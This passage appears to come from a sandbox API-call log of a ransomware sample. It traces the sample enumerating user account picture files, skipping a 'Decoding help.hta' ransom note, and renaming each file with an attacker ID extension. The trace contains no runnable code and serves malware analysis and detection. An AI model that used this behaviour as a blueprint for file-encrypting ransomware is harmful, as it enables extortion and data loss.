Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.997] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.997] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile32.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" [0053.998] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" [0053.998] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.998] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4b0a44, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4b0a44, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd4482cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0053.998] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.998] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.998] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile33.bmp") returned -1 [0053.998] lstrlenW (lpString="usertile33.bmp") returned 14 [0053.998] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.998] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile33.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" [0053.998] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" [0053.998] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.998] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9c9561, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0053.998] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.999] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.999] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile34.bmp") returned -1 [0053.999] lstrlenW (lpString="usertile34.bmp") returned 14 [0053.999] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.999] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.999] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile34.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" [0053.999] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" [0053.999] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.000] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0054.000] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.000] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.000] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.000] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.000] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile35.bmp") returned -1 [0054.000] lstrlenW (lpString="usertile35.bmp") returned 14 [0054.000] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.000] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.000] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile35.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" [0054.000] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" [0054.000] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.000] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae548fb8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae548fb8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0054.000] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.000] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.000] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.000] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.000] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile36.bmp") returned -1 [0054.001] lstrlenW (lpString="usertile36.bmp") returned 14 [0054.001] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.001] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.001] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile36.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" [0054.001] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" [0054.001] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.001] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae595272, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae595272, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0054.001] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.001] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.001] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.001] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.001] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile37.bmp") returned -1 [0054.001] lstrlenW (lpString="usertile37.bmp") returned 14 [0054.001] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.001] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.001] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile37.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" [0054.001] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" [0054.001] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.001] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bb3cf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5bb3cf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0054.002] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.002] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.002] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.002] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile38.bmp") returned -1 [0054.002] lstrlenW (lpString="usertile38.bmp") returned 14 [0054.002] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.002] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile38.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" [0054.002] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" [0054.002] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.003] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5e152c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5e152c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc2ab41, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0054.003] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.003] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.003] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile39.bmp") returned -1 [0054.003] lstrlenW (lpString="usertile39.bmp") returned 14 [0054.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User 